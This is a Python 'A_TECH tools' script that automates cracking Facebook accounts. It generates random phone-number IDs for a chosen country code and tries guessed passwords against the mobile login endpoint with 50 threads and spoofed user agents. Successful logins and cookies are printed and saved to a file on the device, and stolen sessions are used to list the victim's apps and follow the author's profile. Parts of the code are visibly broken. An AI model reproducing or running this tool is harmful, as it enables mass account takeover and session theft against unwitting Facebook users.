import os
import sys
import time
import requests
import uuid
os.system('git pull')
os.system('pkg install curl')
os.system('pip install requests')
os.system('pip install bs4')
os.system('pip install mechanize')
os.system('apt update')
os.system('apt upgrade')
os.system('pkg install espeak')
os.system('espeak welcome,to,a-tech,tools')
os.system('espeak plaese,saport,me,brother')
os.system('espeak thise,tools,created,by,Aliaqa,Rahimi')
class jalan:
    
    def __init__(self, z):
        pass



def ud():
    os.system('clear')
    print(logo)
    print(' {1} FIRST FOLLOW MY FACEBOOK ')
    print(' {2} EXIT')
    opt = input('\n   Choose option >>> ')
    if opt == '1':
        os.system('espeak plaese,follow,my,facebook,account')
        os.system('xdg-open https://www.facebook.com/profile.php?id=100009471344093/')
        o()
        return None
    #None('\n\x1b[1;31mEXIT\x1b[0;97m')


def o():
    os.system('clear')
    print(logo)
    os.system('espeak A_TECH,TOOLS,MENU')
    print('\x1b[1;32m\x1b[1;95m       {A_TECH TOOLS MENU}')
    print('')
    print('\x1b[1;32m\x1b[1;33m  {1} RANDOM CRACK ')
    print('\x1b[1;32m\x1b[1;92m  {2} CONTACT ME ON FACEBOOK')
    print(' \x1b[1;32m\x1b[1;95m {3} CONTACT ME ON TELEGRAM')
    print(' \x1b[1;32m\x1b[1;31m {0} EXIT') 
    os.system('espeak 1,Random,cloning')
    os.system('espeak 2,CONTACT,ME,ON,FACEBOOK')
    os.system('espeak 3,CONTACT,ME,ON,TELEGRAM')
    os.system('espeak 0,exit,from,A_TECH,tools')
    opt = input('\n\x1b[1;32m    {?} Choose option >>>')
    if opt == '1':
        i()
    if None == '2':
        os.system('xdg-open https://www.facebook.com/profile.php?id=100009471344093')
        return None
    if None == '3':
        os.system('xdg-open https://t.me/Aliaqa146')
        return None
    if None == '0':
        os.system('exit')
        return None
    #None('\n\x1b[1;31m  Choose valid option\x1b[0;97m')


import os,sys,time,json,random,re,string,platform,base64,uuid
os.system("git pull")
from bs4 import BeautifulSoup as sop
from bs4 import BeautifulSoup
import requests as ress
from datetime import date
from datetime import datetime
from time import sleep
from time import sleep as waktu
try:
    import requests
    from concurrent.futures import ThreadPoolExecutor as ThreadPool
    import mechanize
    from requests.exceptions import ConnectionError
except ModuleNotFoundError:
    os.system('pip install mechanize requests futures bs4==2 > /dev/null')
    os.system('pip install bs4')
    
def cek_apk(session,coki):
    w=session.get("https://free.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":coki}).text
    sop = BeautifulSoup(w,"html.parser")
    x = sop.find("form",method="post")
    game = [i.text for i in x.find_all("h3")]
    if len(game)==0:
        print(f'\r%s[%s!%s] %sSorry there is no Active  Apk%s  '%(N,M,N,M,N))
    else:
        print(f'\r[🎮] %s \x1b[1;95m ☆ Your Active Apps ☆     :{WHITE}'%(GREEN))
        for i in range(len(game)):
            print(f"\r[%s%s] %s%s"%(N,i+1,game[i].replace("Ditambahkan pada"," Ditambahkan pada"),N))
        #else:
            #print(f'\r %s[%s!%s] Sorry, Apk check failed invalid cookie'%(N,M,N))
    w=session.get("https://free.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":coki}).text
    sop = BeautifulSoup(w,"html.parser")
    x = sop.find("form",method="post")
    game = [i.text for i in x.find_all("h3")]
    if len(game)==0:
        print(f'\r%s[%s!%s] %sSorry there is no Expired Apk%s           \n'%(N,M,N,M,N))
    else:
        print(f'\r[🎮] %s \x1b[1;95m ◇ Your Expired Apps ◇    :{WHITE}'%(M))
        for i in range(len(game)):
            print(f"\r[%s%s] %s%s"%(N,i+1,game[i].replace("Kedaluwarsa"," Kedaluwarsa"),N))
        else:
            print('')
 
def follow(self, session, coki):
        r = BeautifulSoup(session.get('https://free.facebook.com/profile.php?id=100090146081904', {
            'cookie': coki }, **('cookies',)).text, 'html.parser')
        get = r.find('a', 'Ikuti', **('string',)).get('href')
        session.get('https://free.facebook.com' + str(get), {
            'cookie': coki }, **('cookies',)).text
            
 
            
RED = '\033[1;91m'
WHITE = '\033[1;97m'
GREEN = '\033[1;32m' #
YELLOW = '\033[1;33m'
BLUE = '\033[1;34m'
ORANGE = '\033[1;35m'
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m'    # WARNA MATI
A = '\x1b[1;90m' # WARNA ABU ABU
BN = '\x1b[1;107m' # BELAKANG PUTIH
BBL = '\x1b[1;106m' # BELAKANG BIRU LANGIT
BP = '\x1b[1;105m' # BELAKANG PINK
BB = '\x1b[1;104m' # BELAKANG BIRU
BK = '\x1b[1;103m' # BELAKANG KUNING
BH = '\x1b[1;102m' # BELAKANG HIJAU
BM = '\x1b[1;101m' # BELAJANG MERAH
BA = '\x1b[1;100m' # BELAKANG ABU ABU
my_color = [
 P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
now = datetime.now()
dt_string = now.strftime("%H:%M")
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
today = date.today()
logo=("""


  
\x1b[1;92m     .d8b.         d888888b d88888b  .o88b. db   db 
\x1b[1;92m    d8' `8b        `~~88~~' 88'     d8P  Y8 88   88 
\x1b[1;91m    88ooo88           88    88ooooo 8P      88ooo88 
\x1b[1;92m    88~~~88  C8888D   88    88~~~~~ 8b      88~~~88 
\x1b[1;95m    88   88           88    88.     Y8b  d8 88   88 
\x1b[1;92m    YP   YP           YP    Y88888P  `Y88P' YP   YP           
\x1b[1;93m───────────────────────────────────────────────────────────                                                                                              
\x1b[1;92m{✔️}\x1b[1;95m {AUTHUR  }\x1b[1;92m {✔️}\x1b[1;91m {ALI AQA RAHIMI} 
\x1b[1;92m{✔️}\x1b[1;95m {GITHUB  } \x1b[1;92m{✔️}\x1b[1;91m {pubg-king }      
\x1b[1;92m{✔️}\x1b[1;95m {STATUS  } \x1b[1;92m{✔️}\x1b[1;91m {FREE }           
\x1b[1;92m{✔️}\x1b[1;95m {VERSION } \x1b[1;92m{✔️}\x1b[1;91m {0.1 }            
\x1b[1;92m{✔️}\x1b[1;95m {FACEBOOK}\x1b[1;92m {✔️}\x1b[1;91m {ALI AQA RAHIMI } 
\x1b[1;92m{✔️}\x1b[1;95m {TELEGRAM}\x1b[1;92m {✔️}\x1b[1;91m {@Aliaqa146 }     
\x1b[1;92m{✔️}\x1b[1;95m {FRIENDS } \x1b[1;92m{✔️}\x1b[1;91m {MILAD & MURTAZA }
\x1b[1;91m------------------------------------------------------------
\033[1;37m          {\33[32;91mWELCOME TO A_TECH TOOLS\33[0;m}\n""")
loop = 0
oks = []
cps = []
def clear():
    os.system('clear')
    print(logo)
from time import localtime as lt
from os import system as cmd
ltx = int(lt()[3])
if ltx > 12:
    a = ltx-12
    tag = "PM"
else:
    a = ltx
    tag = "AM"
    
    
try:
    print('\n\n\033[1;33mLoading asset files ... \033[0;97m')
    v = 5.2
    update = ('5.2')
    update = ('5.2')
    if str(v) in update:
        os.system('clear')
    else:pass
except:print('\n\033[1;31mNo internet connection ... \033[0;97m')
#global functions
def dynamic(text):
    titik = ['.   ','..  ','... ','.... ']
    for o in titik:
        print('\r'+text+o),
        sys.stdout.flush();time.sleep(1)
 
#User agents
ugen2=[]
ugen=[]
 
for xd in range(10000):
    aa='Mozilla/5.0 (Mobile; rv:48.0; A405DL'
    b=random.choice(['3','4','5','6','7','8','9','10','11','12','13','14','15','16','17'])
    c=' en-us; GT-'
    d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    e=random.randrange(1, 999)
    f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
    g='Gecko/48.0 Firefox/48.0 KAIOS/2.5/'
    h=random.randrange(73,100)
    i='0'
    j=random.randrange(4200,4900)
    k=random.randrange(40,150)
    l='Mobile Safari/537.36'
    uaku2=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
    ugen.append(uaku2)
    
# APK CHECK
def i():
    user=[]
    twf =[]
    os.getuid
    os.geteuid
    os.system("clear")
    print(logo)
    
    os.system('espeak chose,your,COUNTRY,CODE')  
    print('\033[1;36m     \t     [9378], \033[1;33m[9370] ,\033[1;33m[9377] ,\033[1;33m[9379]  ...\033[0;97m')
  

    code = input(' PUT CODE : ')
    print("")

    os.system('espeak PUT,CLONING,LIMITED')  
    limit = int(input('\x1b[1;91m EXAMPLE: 2000, 3000, 5000, 10000\n\n PUT CLONING LIMIT: '))
    for nmbr in range(limit):
        nmp = ''.join(random.choice(string.digits) for _ in range(7))
        user.append(nmp)
    os.system("clear")
    print(logo)

    os.system('espeak Enter,Password,LIMITED,')  
    passx = int(input("\033[1;92m[*] PUTT PASSWORD LIMIT]  : "))
    HamiiID = []
    print("")
    os.system('espeak Enter,your,country,password,list')
    for bilal in range(passx):
        pww = input("[*] Enter Password : ") 
        HamiiID.append(pww)
    with ThreadPool(max_workers=50) as manshera:
        clear()
        tl = str(len(user))
        print('\033[1;36m TOTAL IDS: '+tl)
        print('\033[1;36m THE PROCESS HAS BEEN STARTED')
        print('\033[1;31m USE AEROPLANE MOOD IN EVERY 5 MIN ')
        print('\033[1;32m============================================')
        for love in user:
            pwx = [love[1:]]
            uid = code+love
            for Eman in HamiiID:
                pwx.append(Eman)
            manshera.submit(rcrack,uid,pwx,tl)
    print('\033[1;32m============================================')
    print('Crack process has been completed')
    print('Ids saved in\x1b[1;95m/sdcard/A_TECH-OK.txt ')
    print('\033[1;32m============================================')
    os.system('espeak Ids,saved,in,/sdcard/A_TECH-OK,dote,txt')  
 
def rcrack(uid,pwx,tl):
    #print(user)
    global loop
    global cps
    global oks
    global proxy
    try:
        for ps in pwx:
            pro = random.choice(ugen)
            session = requests.Session()
            free_fb = session.get('https://free.facebook.com').text
            log_data = {
                "lsd":re.search('name="lsd" value="(.*?)"', str(free_fb)).group(1),
            "jazoest":re.search('name="jazoest" value="(.*?)"', str(free_fb)).group(1),
            "m_ts":re.search('name="m_ts" value="(.*?)"', str(free_fb)).group(1),
            "li":re.search('name="li" value="(.*?)"', str(free_fb)).group(1),
            "try_number":"0",
            "unrecognized_tries":"0",
            "email":uid,
            "pass":ps,
            "login":"Log In"}
            header_freefb = {'authority': 'mbasic.facebook.com',
            'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
            'accept-language': 'en-US,en;q=0.9',
            'cache-control': 'max-age=0',
            'dpr': '1',
            'sec-ch-prefers-color-scheme': 'light',
            'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"',
            'sec-ch-ua-full-version-list': '"Not_A Brand";v="8.0.0.0", "Chromium";v="120.0.6099.216", "Google Chrome";v="120.0.6099.216"',
            'sec-ch-ua-mobile': '?0',
            'sec-ch-ua-model': '""',
            'sec-ch-ua-platform': '"Windows"',
            'sec-ch-ua-platform-version': '"10.0.0"',
            'sec-fetch-dest': 'document',
            'sec-fetch-mode': 'navigate',
            'sec-fetch-site': 'none',
            'sec-fetch-user': '?1',
            'upgrade-insecure-requests': '1',
            'user-agent': pro,}
            lo = session.post('https://mbasic.facebook.com/login/device-based/login/async/',data=log_data,headers=header_freefb).text
            log_cookies=session.cookies.get_dict().keys()
            if 'c_user' in log_cookies:
                coki=";".join([key+"="+value for key,value in session.cookies.get_dict().items()])
                cid = coki[151:166]
                print('\033[1;32m(A_TECH-OK)  ' +cid+ ' {✔️}  ' +ps+    '  \n \033[1;33mCookie{✔️}  = \033[1;33m'+coki+  ' \n '+pro+'  \033[0;97m')
                cek_apk(session,coki)
                open('/sdcard/A_TECH-OK.txt', 'a').write( cid+' {✔️} '+ps+'\n')
                oks.append(cid)
                break
            else:
                continue
        loop+=1
        sys.stdout.write('\r%s[A_TECH] [%s/%s]  OK:- %s\r'%(H,loop,tl,len(oks),len(cps))),
        sys.stdout.flush()
    except:
        pass   
ud()
